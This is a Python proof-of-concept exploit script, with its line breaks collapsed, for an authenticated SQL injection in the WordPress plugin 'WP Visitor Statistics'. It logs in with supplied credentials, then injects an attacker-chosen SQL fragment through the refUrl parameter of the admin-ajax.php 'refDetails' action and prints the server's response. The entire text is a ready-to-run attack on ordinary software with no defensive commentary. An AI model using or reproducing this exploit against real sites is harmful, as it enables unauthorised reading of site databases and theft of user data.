import argparseimport requestsfrom datetime import datetime
# User-Input:my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection')my_parser.add_argument('-T', '--IP', type=str)my_parser.add_argument('-P', '--PORT', type=str)my_parser.add_argument('-U', '--PATH', type=str)my_parser.add_argument('-u', '--USERNAME', type=str)my_parser.add_argument('-p', '--PASSWORD', type=str)my_parser.add_argument('-C', '--COMMAND', type=str)args = my_parser.parse_args()target_ip = args.IPtarget_port = args.PORTwp_path = args.PATHusername = args.USERNAMEpassword = args.PASSWORDcommand = args.COMMAND
print('')print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))print('')
# Authentication:session = requests.Session()auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'check = session.get(auth_url)# Header:header = {    'Host': target_ip,    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',    'Accept-Encoding': 'gzip, deflate',    'Content-Type': 'application/x-www-form-urlencoded',    'Origin': 'http://' + target_ip,    'Connection': 'close',    'Upgrade-Insecure-Requests': '1'}
# Body:body = {    'log': username,    'pwd': password,    'wp-submit': 'Log In',    'testcookie': '1'}auth = session.post(auth_url, headers=header, data=body)
# Exploit:exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}'exploit = session.get(exploit_url)print(exploit.text)print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))